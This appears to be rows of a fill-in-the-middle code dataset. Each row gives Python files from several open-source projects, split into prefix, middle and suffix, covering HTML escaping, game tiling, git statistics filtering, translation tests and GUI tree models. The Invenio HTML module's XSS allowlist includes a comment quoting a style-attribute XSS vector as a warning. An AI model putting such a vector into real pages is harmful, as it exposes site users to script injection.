repo_name
stringlengths
5
100
path
stringlengths
4
231
language
stringclasses
1 value
license
stringclasses
15 values
size
int64
6
947k
score
float64
0
0.34
prefix
stringlengths
0
8.16k
middle
stringlengths
3
512
suffix
stringlengths
0
8.17k
Dziolas/invenio
modules/miscutil/lib/htmlutils.py
Python
gpl-2.0
37,499
0.004293
# -*- coding: utf-8 -*- ## ## This file is part of Invenio. ## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2013 CERN. ## ## Invenio is free software; you can redistribute it and/or ## modify it under the terms of the GNU General Public License as ## published by the Free Software Foundation; either version 2 of the ## License, or (at your option) any later version. ## ## Invenio is distributed in the hope that it will be useful, but ## WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with Invenio; if not, write to the Free Software Foundation, Inc., ## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """HTML utilities.""" __revision__ = "$Id$" from HTMLParser import HTMLParser from invenio.config import CFG_SITE_URL, \ CFG_MATHJAX_HOSTING, \ CFG_MATHJAX_RENDERS_MATHML, \ CFG_SITE_LANG, \ CFG_WEBDIR from invenio.textutils import indent_text, encode_for_xml import re import cgi import os import sys if sys.hexversion < 0x2060000: try: import simplejson as json CFG_JSON_AVAILABLE = True except ImportError: # Okay, no Ajax app will be possible, but continue anyway, # since this package is only recommended, not mandatory. CFG_JSON_AVAILABLE = False json = None else: import json CFG_JSON_AVAILABLE = True try: from BeautifulSoup import BeautifulSoup CFG_BEAUTIFULSOUP_INSTALLED = True except ImportError: CFG_BEAUTIFULSOUP_INSTALLED = False try: import tidy CFG_TIDY_INSTALLED = True except ImportError: CFG_TIDY_INSTALLED = False # List of allowed tags (tags that won't create any XSS risk) CFG_HTML_BUFFER_ALLOWED_TAG_WHITELIST = ('a', 'p', 'br', 'blockquote', 'strong', 'b', 'u', 'i', 'em', 'ul', 'ol', 'li', 'sub', 'sup', 'div', 'strike') # List of allowed attributes. Be cautious, some attributes may be
risky: # <p style="background: url(myxss_suite.js)"> CFG_HTML_BUFFER_ALLOWED_ATTRIBUTE_WHITELIST = ('href', 'name', 'class') ## precompile some often-used regexp for speed reasons: RE_HTML = re.compile("(?s)<[^>]*>|&#?\w+;") RE_HTML_WITHOUT_ESCAPED_CHARS = re.compile("(?s)<[^>]*>") # url validation regex regex_url = re.compile(r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain... r'localhost|' #localhost... r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip r'(?::\d+)?' # optional port r'(?:/?|[/?]\S+)$', re.IGNORECASE) def nmtoken_from_string(text): """ Returns a Nmtoken from a string. It is useful to produce XHTML valid values for the 'name' attribute of an anchor. CAUTION: the function is surjective: 2 different texts might lead to the same result. This is improbable on a single page. Nmtoken is the type that is a mixture of characters supported in attributes such as 'name' in HTML 'a' tag. For example, <a name="Articles%20%26%20Preprints"> should be tranformed to <a name="Articles372037263720Preprints"> using this function. http://www.w3.org/TR/2000/REC-xml-20001006#NT-Nmtoken Also note that this function filters more characters than specified by the definition of Nmtoken ('CombiningChar' and 'Extender' charsets are filtered out). """ text = text.replace('-', '--') return ''.join( [( ((not char.isalnum() and not char in ['.', '-', '_', ':']) and str(ord(char))) or char) for char in text] ) def escape_html(text, escape_quotes=False): """Escape all HTML tags, avoiding XSS attacks. < => &lt; > => &gt; & => &amp: @param text: text to be escaped from HTML tags @param escape_quotes: if True, escape any quote mark to its HTML entity: " => &quot; ' => &#39; """ text = text.replace('&', '&amp;') text = text.replace('<', '&lt;') text = text.replace('>', '&gt;') if escape_quotes: text = text.replace('"', '&quot;') text = text.replace("'", '&#39;') return text CFG_JS_CHARS_MAPPINGS = { '\\': '\\\\', "'": "\\'", '"': '\\"', '\b': '\\b', '\f': '\\f', '\n': '\\n', '\r': '\\r', '\t': '\\t', '\v': '\\v', } for i in range(0x20): CFG_JS_CHARS_MAPPINGS.setdefault(chr(i), '\\u%04x' % (i,)) for i in (0x2028, 0x2029): CFG_JS_CHARS_MAPPINGS.setdefault(unichr(i), '\\u%04x' % (i,)) RE_ESCAPE_JS_CHARS = re.compile(u'''[\\x00-\\x1f\\\\"\\\\'\\b\\f\\n\\r\\t\\v\u2028\u2029]''') RE_CLOSING_SCRIPT_TAG = re.compile('</script>', re.IGNORECASE) def escape_javascript_string(text, escape_for_html=True, escape_quote_for_html=False, escape_CDATA=True, escape_script_tag_with_quote='"'): """ Escape text in order to be used as Javascript string in various context. Examples:: >>> text = '''"Are you a Munchkin?" asked Dorothy. "No, but I am their friend"''' >>> escape_javascript_string(text) >>> \\"&quot;Are you a Munchkin?\\" asked Dorothy.\\n\\"No, but I am their friend\\"' The returned string can be enclosed either in single or double quotes delimiters. THE FUNCTION ASSUME THAT YOU HAVE ALREDADY WASHED THE STRING FROM UNSAFE CONTENT, according to the context you plan to use the string. The function will just make sure that the string will not break you Javascript/HTML code/markup. If you plan to include the string inside the body of an HTML page, you will probably want to set C{escape_for_html} to True, in order to produce XHTML-valid pages when the input string contain characters such as < , > and &. Furthermore if you plan to include the string as part of a tag attribute (for eg. <a href="#" onclick="foo&quot;bar"), you might want to set C{escape_quote_for_html} to True. If you plan to include the string inside the body of an HTML page, enclosed by CDATA delimiters, then you would *not* need to escape HTML tags. Using CDATA delimeters enables to include Javascript strings meant to refer to HTML tags (eg. in case you would like to manipulate the DOM tree to add new nodes to the page), which would not be possible when escaping the HTML. For eg.: /*<![CDATA[*/ document.getElementById('foo').innerHTML = '<p>bar</p>' /*]]>*/ In this case you will probably want to set C{escape_CDATA} to True in order to produce an XHTML-valid document, in case a closing CDATA delimeter is in your input string. Parameter C{escape_CDATA} is not considered when C{escape_for_html} is set to True. Note that CDATA delimiters might be automatically added by the browser, based on the content-type used to serve the page. When C{escape_for_html} is set to False, whatever option is chosen for C{escape_CDATA}, the string must not contain a '</script>' tag (apparently...). The only option to keep this '</script>' tag (if you need it) is to split it, which requires to know which quote delimiter your plan to use. For eg: Examples:: >>> text = '''foo</script>bar''' >>> val = escape_javascript_string(text, escape_for_html=False, escape_script_tag_with_quote='"') >>> 'foo</scr"+"ipt>bar' >>> mycode = '''alert("%s")''' % val C{escape_script_tag_with_quote} is not considered when C{escape_for_html} is set to True. If you are planning to return the string as part of a pure Javascript document, then you should in principle set both C{escape_for_html} and C{escape_CDATA} to False, and C{escape_script_tag_with_quote} to None. @param text: string to be escaped @param escape_for_html: if True, also escape input for HTML @param escape_CDATA: if True, escape closing CDATA tags (when C{escape_for_
YannThorimbert/PyWorld2D
rendering/tilers/tilemanager.py
Python
mit
11,093
0.009015
import math, os import pygame import thorpy has_surfarray = False try: from PyWorld2D.rendering.tilers.beachtiler import BeachTiler from PyWorld2D.rendering.tilers.basetiler import BaseTiler from PyWorld2D.rendering.tilers.roundtiler import RoundTiler from PyWorld2D.rendering.tilers.loadtiler import LoadTiler has_surfarray = True except: from PyWorld2D.rendering.tilers.loadtiler import LoadTiler def get_mixed_tiles(img1, img2, alpha_img_2): i1 = img1.copy() i2 = img2.copy() i2.set_alpha(alpha_img_2) i1.blit(i2,(0,0)) return i1 ##def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True): ## w, h = img.get_size() ## s = pygame.Surface((2*w,2*h)) ## s.blit(img, (0,0)) ## s.blit(img, (w,0)) ## s.blit(img, (0,h)) ## s.blit(img, (w,h)) ## #now we just have to take slices ## images = [] ## for i in range(nframes): ## if sin: ## delta_x = dx*math.sin(2.*math.pi*i/float(nframes)) ## delta_y = dy*math.sin(2.*math.pi*i/float(nframes)) ## else: ## delta_x = i*dx ## delta_y = i*dy ## result = pygame.Surface((w,h)) ## result.blit(s,(delta_x-w//2,delta_y-h//2)) ## images.append(result) ## if reverse: ## images += images[::-1][1:-1] ## return images def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True): r = img.get_rect() w,h = r.size images = [] for i in range(nframes): if sin: delta_x = dx*math.sin(2.*math.pi*i/float(nframes)) delta_y = dy*math.sin(2.*math.pi*i/float(nframes)) else: delta_x = i*dx delta_y = i*dy ## print(delta_x,w) ## assert abs(delta_x) <= w ## assert abs(delta_y) <= h result = pygame.Surface(r.size) xsgn, ysgn = 1, 1 if delta_x>0: xsgn = -1 if delta_y>0: ysgn = -1 result.blit(img,r.move(delta_x,delta_y)) result.blit(img,r.move(delta_x,delta_y+ysgn*h)) result.blit(img,r.move(delta_x+xsgn*w,delta_y)) result.blit(img,r.move(delta_x+xsgn*w,delta_y+ysgn*h)) images.append(result) if reverse: images += images[::-1][1:-1] return images def build_tiles(img_fullsize, sizes, nframes, dx_divider=0, dy_divider=0, reverse=False, sin=True, colorkey=None): """Returns a list of list of images on the form : imgs[size][frame]""" imgs = [] for size in sizes: #smoothscale is important here, otherwise FAST should be always True img = pygame.transform.smoothscale(img_fullsize, (size,)*2) dx = 0 if dx_divider: dx = int(size/dx_divider) dy = 0 if dy_divider: dy = int(size/dy_divider) imgs.append(get_shifted_tiles(img, nframes, dx, dy, reverse, sin)) if colorkey: for tiles in imgs: for img in tiles: img.set_colorkey(colorkey) return imgs def build_color_tiles(color, sizes, nframes, reverse=False, sin=True): imgs = [] for size in sizes: img = pygame.Surface((size,)*2) img.fill(color) imgs.append(get_shifted_tiles(img, nframes, 0, 0, reverse, sin)) return imgs def get_radiuses(nframes, initial_value, increment, reverse=False, sin=True): values = [] if sin: current = initial_value else: current = 0 for i in range(nframes): if sin: delta = increment*math.sin(2.*math.pi*i/float(nframes)) else: delta = increment current += delta values.append(int(current)) if reverse: values = values[::-1][1:-1] return values def build_tilers(grasses, waters, radius_divider, use_beach_tiler): nzoom = len(grasses) assert nzoom == len(waters) #same number of zoom levels nframes = len(grasses[0]) for z in range(nzoom): assert nframes == len(waters[z]) #same number of frames tilers = [[None for n in range(nframes)] for z in range(nzoom)] for z in range(nzoom): cell_size = grasses[z][0].get_width() radius = cell_size//radius_divider for n in range(nframes): if use_beach_tiler: tiler = BeachTiler(grasses[z][n], waters[z][n]) tiler.make(size=(cell_size,)*2, radius=radius) else: tiler = BaseTiler(grasses[z][n]) tiler.make(size=(cell_size,)*2, radius=0) tilers[z][n] = tiler return tilers def build_static_tilers(grasses, waters, radius_divider, use_beach_tiler): nzoom = len(grasses) assert nzoom == len(waters) #same number of zoom levels nframes = len(grasses[0]) for z in range(nzoom): assert nframes == len(waters[z]) #same number of frames tilers = [[None for n in range(nframes)] for z in range(nzoom)] for z in range(nzoom): cell_size = grasses[z][0].get_width() radius = cell_size//radius_divider if use_beach_tiler: tiler = BeachTiler(grasses[z][0], waters[z][0]) tiler.make(size=(cell_size,)*2, radius=radius) else: tiler = BaseTiler(grasse
s[z][0]) tiler.make(size=(cell_size,)*2, radius=0) for n in range(nframes): tilers[z][n] = tiler return tilers def build_tilers_fast(grasses, wate
rs, radius_divider, use_beach_tiler): nzoom = len(grasses) assert nzoom == len(waters) #same number of zoom levels nframes = len(grasses[0]) for z in range(nzoom): assert nframes == len(waters[z]) #same number of frames tilers = [[None for n in range(nframes)] for z in range(nzoom)] cell_size = grasses[0][0].get_width() radius = cell_size//radius_divider for n in range(nframes): if use_beach_tiler: tiler = BeachTiler(grasses[0][n], waters[0][n]) tiler.make(size=(cell_size,)*2, radius=radius) else: tiler = BaseTiler(grasses[0][n]) tiler.make(size=(cell_size,)*2, radius=0) tilers[0][n] = tiler if nzoom > 1: for z in range(1,nzoom): for n in range(nframes): if use_beach_tiler: tiler = BeachTiler(grasses[z][n], waters[z][n]) else: tiler = BaseTiler(grasses[z][n]) size = grasses[z][n].get_size() ref = tilers[0][n] for key in ref.imgs: tiler.imgs[key] = pygame.transform.scale(ref.imgs[key], size) tilers[z][n] = tiler return tilers def load_tilers_dynamic(i, grasses, waters, folder): #pour static, nframes=1 nzoom = len(grasses) assert nzoom == len(waters) #same number of zoom levels nframes = len(grasses[0]) for z in range(nzoom): assert nframes == len(waters[z]) #same number of frames tilers = [[None for n in range(nframes)] for z in range(nzoom)] for z in range(nzoom): #PEUT ETRE LARGEMENT OPTIMIZE VU QUE ON POURRAIT LOADER UNE SEULE FOIS CHAQUE IMAGE, A LA PLACE DE z FOIS cell_size = grasses[z][0].get_width() for n in range(nframes): basename = os.path.join(folder,str(i)+"_"+str(n)+"_") tilers[z][n] = LoadTiler(basename, (cell_size,)*2) return tilers def load_tilers_static(i, grasses, waters, folder): #pour static, nframes=1 nzoom = len(grasses) assert nzoom == len(waters) #same number of zoom levels nframes = len(grasses[0]) for z in range(nzoom): assert nframes == len(waters[z]) #same number of frames tilers = [[None for n in range(nframes)] for z in range(nzoom)] for z in range(nzoom): #PEUT ETRE LARGEMENT OPTIMIZE VU QUE ON POURRAIT LOADER UNE SEULE FOIS CHAQUE IMAGE, A LA PLACE DE z FOIS cell_size = grasses[z][0].get_width() basename = os.path.join(folder,str(i)+"_"+str(0)+"_") tiler = LoadTiler(basename, (cell_size,)*2) for n in range(nframes): tilers[z][n] = tiler return tilers def get_material_couples(materials, radius_divider, fast, use_beach_tiler,
vpol/gitinspector
gitinspector/filtering.py
Python
gpl-3.0
5,218
0.003642
# coding: utf-8 # # Copyright © 2012-2014 Ejwa Software. All rights reserved. # # This file is part of gitinspector. # # gitinspector is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # gitinspector is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with gitinspector. If not, see <http://www.gnu.org/licenses/>. from __future__ import print_function from __future__ import unicode_literals import re import textwrap from gitinspector.localization import N_ from gitinspector.outputable import Outputable from gitinspector import terminal __filters__ = {"file": [[], set()], "author": [[], set()], "email": [[], set()]} class InvalidRegExpError(ValueError): def __init__(self, msg): super(InvalidRegExpError, self).__init__(msg) self.msg = msg def get(): return __filters__ def __add_one__(string): for i in __filters__: if (i + ":").lower() == string[0:len(i) + 1].lower(): __filters__[i][0].append(string[len(i) + 1:]) return __filters__["file"][0].append(string) def add(string): rules = string.split(",") for rule in rules: __add_one__(rule) def clear(): for i in __filters__: __filters__[i][0] = [] def get_filered(filter_type="file"): return __filters__[filter_type][1] def has
_filtered(): for i in __filters__: if __filters__[i][1]: return True return False def set_filtered(string, filter_type="file"): string = string.strip() if len(string) > 0: for i in __filters__[filter_type][0]: tr
y: if re.search(i, string) != None: __filters__[filter_type][1].add(string) return True except: raise InvalidRegExpError(_("invalid regular expression specified")) return False FILTERING_INFO_TEXT = N_( "The following files were excluded from the statistics due to the specified exclusion patterns") FILTERING_AUTHOR_INFO_TEXT = N_( "The following authors were excluded from the statistics due to the specified exclusion patterns") FILTERING_EMAIL_INFO_TEXT = N_( "The authors with the following emails were excluded from the statistics due to the specified exclusion patterns") class Filtering(Outputable): @staticmethod def __output_html_section__(info_string, filtered): filtering_xml = "" if filtered: filtering_xml += "<p>" + info_string + "." + "</p>" for i in filtered: filtering_xml += "<p>" + i + "</p>" return filtering_xml def output_html(self): if has_filtered(): filtering_xml = "<div><div class=\"box\">" Filtering.__output_html_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1]) Filtering.__output_html_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1]) Filtering.__output_html_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1]) filtering_xml += "</div></div>" print(filtering_xml) @staticmethod def __output_text_section__(info_string, filtered): if filtered: print("\n" + textwrap.fill(info_string + ":", width=terminal.get_size()[0])) for i in filtered: (width, _unused) = terminal.get_size() print("...%s" % i[-width + 3:] if len(i) > width else i) def output_text(self): Filtering.__output_text_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1]) Filtering.__output_text_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1]) Filtering.__output_text_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1]) @staticmethod def __output_xml_section__(info_string, filtered, container_tagname): if filtered: message_xml = "\t\t\t<message>" + info_string + "</message>\n" filtering_xml = "" for i in filtered: filtering_xml += "\t\t\t\t<entry>".format(container_tagname) + i + "</entry>\n".format( container_tagname) print("\t\t<{0}>".format(container_tagname)) print(message_xml + "\t\t\t<entries>\n" + filtering_xml + "\t\t\t</entries>\n") print("\t\t</{0}>".format(container_tagname)) def output_xml(self): if has_filtered(): print("\t<filtering>") Filtering.__output_xml_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1], "files") Filtering.__output_xml_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1], "authors") Filtering.__output_xml_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1], "emails") print("\t</filtering>")
freedomofkeima/messenger-maid-chan
tests/test_translate.py
Python
mit
1,946
0
# -*- coding: utf-8 -*- import os from mock import Mock, patch from maidchan.translate import get_trans_language_prediction, get_translation SCRIPT_PATH = os.path.abspath(os.path.dirname(__file__)) def _get_response(name): path = os.path.join(SCRIPT_PATH, 'data', name) with open(path) as f: return f.read().encode("utf-8") def mocked_trans(*args, **kwargs): """ Mocked "trans" """ process_mock = Mock() return_value = None if '-id' in args[0] and 'hello, world!' in args[0]: return_value = _get_response('get_trans_prediction.txt')
elif '-b' in args[0] and 'en:ja' in args[0] and 'hello, world!' in args[0]: return_value = _get_response('get_trans_translation.txt') elif '-b' in args[0] and 'en:id' in args[0] and 'hello, world!' in args[0]: return_value = _get_response('get_trans_translation_2.txt') attrs = {'communicate.return_value': (return_value, None)} process
_mock.configure_mock(**attrs) return process_mock class TestTranslate: @patch('subprocess.Popen', side_effect=mocked_trans) def test_get_translate_language_prediction(self, mock_trans): assert get_trans_language_prediction("hello, world!") == "en" @patch('subprocess.Popen', side_effect=mocked_trans) def test_get_translation_en_to_ja(self, mock_trans): query = "translate hello, world! from english to japanese" assert get_translation(query) == "こんにちは世界!" @patch('subprocess.Popen', side_effect=mocked_trans) def test_get_translation_en_to_default(self, mock_trans): query = "translate hello, world! from english" assert get_translation(query) == "こんにちは世界!" @patch('subprocess.Popen', side_effect=mocked_trans) def test_get_translation_default_to_id(self, mock_trans): query = "translate hello, world! to bahasa" assert get_translation(query) == "Halo Dunia!"
Snegovikufa/HPGL-GUI
gui_widgets/treemodel.py
Python
gpl-2.0
12,137
0.004696
#from PySide import QtGui, QtCore #from cube_list import CubeItem, RootItem # #class TreeModel(QtGui.QStandardItemModel): # def __init__(self, rows, columns, contCubes, indCubes, parent = None): # super(TreeModel, self).__init__(rows, columns, parent) # self.contCubes = contCubes # self.indCubes = indCubes # ## self.rootItem = CubeItem() # # def flags(self, index): # if index.parent() == QtCore.QModelIndex(): # return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable # # if index.column() == 1 or index.column() == 2: # return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable # # # return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable # # def setData(self, index, value, role=QtCore.Qt.EditRole): # if role != QtCore.Qt.EditRole: # return False # variant = value # if index.column() == 0: # value = str(value.toString()) # # if index.row() == 0: # self.contCubes.setName(value, index.row()) # if index.row() == 1: #index.parent.row()==1 # self.indCubes.setName(value, index.row()) # # result = True # # if index.column() == 3: # value = int(value) # # if index.row() == 0: # self.contCubes.changeUndefValue(value, index.row()) # if index.row() == 1: # self.indCubes.changeUndefValue(value, index.row()) # # result = True # # if result: # self.dataChanged.emit(index, index) # return result from PySide import QtCore, QtGui class TreeItem(object): def __init__(self, data, parent=None): self.parentItem = parent self.itemData = data self.childItems = [] def child(self, row): return self.childItems[row] def childCount(self): return len(self.childItems) def childNumber(self): if self.parentItem != None: return self.parentItem.childItems.index(self) return 0 def columnCount(self): return len(self.itemData) def data(self, column): return self.itemData[column] def insertChildren(self, position, count, columns): if position < 0 or position > len(self.childItems): return False for row in range(count): data = [None for v in range(columns)] item = TreeItem(data, self) self.childItems.insert(position, item) return True def insertColumns(self, position, columns): if position < 0 or position > len(self.itemData): return False for column in range(columns): self.itemData.insert(position, None) for child in self.childItems: child.insertColumns(position, columns) return True def parent(self): return self.parentItem def removeChildren(self, position, count): if position < 0 or position + count > len(self.childItems): return False for row in range(count): self.childItems.pop(position) return True def removeColumns(self, position, columns): if position < 0 or position + columns > len(self.itemData): return False for column in range(columns): self.itemData.pop(position) for child in self.childItems: child.removeColumns(position, columns) return True def setData(self, column, value): if column < 0 or column >= len(self.itemData): return False self.itemData[column] = value return True class TreeModel(QtCore.QAbstractItemModel): def __init__(self, headers, contCubes, indCubes, parent=None): super(TreeModel, self).__init__(parent) self.contCubes = contCubes self.indCubes = indCubes rootData = [header for header in headers] self.rootItem = TreeItem(rootData) # self.setupModelData(data.split("\n"), self.rootItem) def c
olumnCount(self, parent=QtCore.QModelIndex()):
return self.rootItem.columnCount() def data(self, index, role): if not index.isValid(): return None if role == QtCore.Qt.DecorationRole: if self.getItem(index).parent() == self.rootItem: if index.column() == 0: if index.row() == 0: pixmap = QtGui.QPixmap() pixmap.load(':/icons/cont.png') pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio, transformMode=QtCore.Qt.SmoothTransformation) return pixmap if index.row() == 1: pixmap = QtGui.QPixmap() pixmap.load(':/icons/ind.png') pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio, transformMode=QtCore.Qt.SmoothTransformation) return pixmap if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.EditRole: item = self.getItem(index) return item.data(index.column()) return None def flags(self, index): parentItem = self.getItem(index).parent() if parentItem == self.rootItem: return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable if index.column() == 1 or index.column() == 2: return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable def getItem(self, index): if index.isValid(): item = index.internalPointer() if item: return item return self.rootItem def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole): if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole: return self.rootItem.data(section) return None def index(self, row, column, parent=QtCore.QModelIndex()): if parent.isValid() and parent.column() != 0: return QtCore.QModelIndex() parentItem = self.getItem(parent) childItem = parentItem.child(row) if childItem: return self.createIndex(row, column, childItem) else: return QtCore.QModelIndex() def insertColumns(self, position, columns, parent=QtCore.QModelIndex()): self.beginInsertColumns(parent, position, position + columns - 1) success = self.rootItem.insertColumns(position, columns) self.endInsertColumns() return success def insertRows(self, position, rows, parent=QtCore.QModelIndex()): parentItem = self.getItem(parent) self.beginInsertRows(parent, position, position + rows - 1) success = parentItem.insertChildren(position, rows, self.rootItem.columnCount()) self.endInsertRows() return success def parent(self, index): if not index.isValid(): return QtCore.QModelIndex() childItem = self.getItem(index) parentItem = childItem.parent() if parentItem == self.rootItem: return QtCore.QModelIndex() return self.createIndex(parentItem.childNumber(), 0, parentItem) def removeColumns(self, position, columns, parent=QtCore.QModelIndex()): self.beginRemoveColumns(parent, position, position + columns - 1) success = self.rootItem.removeColumns(position, columns) self.endRemoveColumns() if self.rootItem.colu
rambo/python-holviapi
holviapi/tests/test_refnos.py
Python
mit
2,888
0
# -*- coding: utf-8 -*- import random import pytest from holviapi.utils import ( ISO_REFERENCE_VALID, fin_reference_isvalid, int2fin_reference, iso_reference_isvalid, str2iso_reference ) def test_fin_reference_isvalid_valid_results(): """Test handpicked, known-good inputs""" assert fin_reference_isvalid(13) assert fin_reference_isvalid(107) assert fin_reference_isvalid(105523) assert fin_reference_isvalid(102319) assert fin_reference_isvalid(108326) assert fin_reference_isvalid(100816) assert fin_reference_isvalid(108724) assert fin_reference_isvalid(108711) def test_fin_reference_isvalid_invalid_results(): """Test handpicked, known-bad inputs""" assert not fin_reference_isvalid(1071110) assert not fin_reference_isvalid(1055110) assert not fin_reference_isvalid(1026110) assert not fin_reference_isvalid(1039110) assert not fin_reference_isvalid(1084110) def test_int2fin_reference_valid_results(): """Test handpicked, known-good inputs and corresponding outputs""" assert int2fin_reference(1) == '13' assert int2fin_reference(10) == '107' assert int2fin_reference(10552) == '105523' assert int2fin_reference(10231) == '102319' assert int2fin_reference(10832) == '108326' assert int2fin_reference(10081) == '100816' assert int2fin_reference(10872) == '108724' assert int2fin_reference(10871) == '108711' def test_int2fin_reference_invalid_results(): """Test some invalid values from issue #6""" assert int2fin_reference(10711) != '1071110' assert int2fin_reference(10551) != '1055110' assert int2fin_reference(10261) != '1026110' assert int2fin_reference(10391) != '1039110' assert int2fin_reference(10841) != '1084110' def test_int2fin_reference_random_inputs(): for x in range(1000): testint = random.randint(1, 2**24) reference = int2fin_reference(testint) assert fin_reference_isvalid(reference) def test_str2iso_reference_valid_results(): assert str2iso_reference('C2H5OH') == 'RF97C2H5OH' def test_str2iso_reference_invalid_results(): assert str2iso_reference('C2H5OH') != 'RF40C2H5OH' def test_iso_reference_isvalid_valid_results(): assert iso_reference_isvalid('RF97C2H5OH') def test_iso_reference_isvalid_invalid_results(): assert not iso_reference_isvalid('RF40C2H5OH') def test_str2iso_reference
_random_integers(): for x in range(1000): testint = random.randint(1, 2**24) reference = str2iso_reference(str(testint)) assert iso_reference_isvalid(reference) def test_str2iso_reference_random_strings(): for x in range(1000): teststr = '' for y in range(5, 14): teststr
+= random.choice(ISO_REFERENCE_VALID) reference = str2iso_reference(teststr) assert iso_reference_isvalid(reference)
welblade/pyrom
test/__init__.py
Python
mit
49
0
#!/usr/bin/env python3
.4 # -*- cod
ing: utf-8 -*-
awslabs/aws-shell
tests/unit/test_fuzzy.py
Python
apache-2.0
629
0
import pytest from awsshell.fuz
zy import fuzzy_search @pytest.mark.parametrize("search,corpus,expected", [ ('foo', ['foobar', 'foobaz'], ['fooba
r', 'foobaz']), ('f', ['foo', 'foobar', 'bar'], ['foo', 'foobar']), ('fbb', ['foo-bar-baz', 'fo-ba-baz', 'bar'], ['foo-bar-baz', 'fo-ba-baz']), ('fff', ['fi-fi-fi', 'fo'], ['fi-fi-fi']), # The more chars it matches, the higher the score. ('pre', ['prefix', 'pre', 'not'], ['pre', 'prefix']), ('nomatch', ['noma', 'nomatccc'], []), ]) def test_subsequences(search, corpus, expected): actual = fuzzy_search(search, corpus) assert actual == expected
uogbuji/akara
test/setup_scripts/setup_basic.py
Python
apache-2.0
108
0.009259
from akara.dist import setup
setup(name="basic", version="1.0", aka
ra_extensions=["blah.py"] )
np1/mps-youtube
mps_youtube/config.py
Python
gpl-3.0
13,150
0.001217
import os import re import sys import copy import pickle from urllib.request import urlopen from urllib.error import HTTPError from urllib.parse import urlencode try: import pylast has_pylast = True except ImportError: has_pylast = False import pafy from . import g, c, paths, util mswin = os.name == "nt" class ConfigItem: """ A configuration item. """ def __init__(self, name, value, minval=None, maxval=None, check_fn=None, require_known_player=False, allowed_values=None): """ If specified, the check_fn should return a dict. {valid: bool, message: success/fail mesage, value: value to set} """ self.default = self.value = value self.name = name self.type = type(value) self.maxval, self.minval = maxval, minval self.check_fn = check_fn self.require_known_player = require_known_player self.allowed_values = [] if allowed_values: self.allowed_values = allowed_values @property def get(self): """ Return value. """ return self.value @property def display(self): """ Return value in a format suitable for display. """ retval = self.value if self.name == "max_res": retval = str(retval) + "p" if self.name == "encoder": retval = str(retval) + " [%s]" % (str(g.encoders[retval]['name'])) return retval def set(self, value): """ Set value with checks. """ # note: fail_msg should contain %s %s for self.name, value # success_msg should not # pylint: disable=R0912 # too many branches success_msg = fail_msg = "" value = value.strip() value_orig = value # handle known player not set if self.allowed_values and value not in self.allowed_values: fail_msg = "%s must be one of * - not %s" allowed_values = copy.copy(self.allowed_values) if '' in allowed_values: allowed_values[allowed_values.index('')] = "<nothing>" fail_msg = fail_msg.replace("*", ", ".join(allowed_values)) if self.require_known_player and \ not util.is_known_player(Config.PLAYER.get): fail_msg = "%s requires mpv or mplayer, can't set to %s" # handle true / false values elif self.type == bool: if value.upper() in "0 OFF NO DISABLED FALSE".split(): value = False success_msg = "%s set to False" % c.c("g", self.name) elif value.upper() in "1 ON YES ENABLED TRUE".split(): value = True success_msg = "%s set to True" % c.c("g", self.name) else: fail_msg = "%s requires True/False, got %s" # handle int values elif self.type == int: if not value.isdigit(): fail_msg = "%s requires a number, got %s" else: value = int(value) if self.maxval and self.minval: if not self.minval <= value <= self.maxval: m = " must be between %s and %s, got " m = m % (self.minval, self.maxval) fail_msg = "%s" + m + "%s" if not fail_msg: dispval = value or "None" success_msg = "%s set to %s" % (c.c("g", self.name), dispval) # handle space separated list elif self.type == list: success_msg = "%s set to %s" % (c.c("g", self.name), value) value = value.split() # handle string values elif self.type == str: dispval = value or "None" success_msg = "%s set to %s" % (c.c("g", self.name), c.c("g", dispval)) # handle failure if fail_msg: failed_val = value_orig.strip() or "<nothing>" colvals = c.y + self.name + c.w, c.y + failed_val + c.w return fail_msg % colvals elif self.check_fn: checked = self.check_fn(value) value = checked.get("value") or value if checked['valid']: value = checked.get("value", value) self.value = value Config.save() return checked.get("message", success_msg) else: return checked.get('message', fail_msg) elif success_msg: self.value = value Config.save() return success_msg def check_console_width(val): """ Show ruler to check console width. """ valid = True message = "-" * val + "\n" message += "console_width set to %s, try a lower value if above line ove"\ "rlaps" % val return dict(valid=valid, message=message) def check_api_key(key): """ Validate an API key by calling an API endpoint with no quota 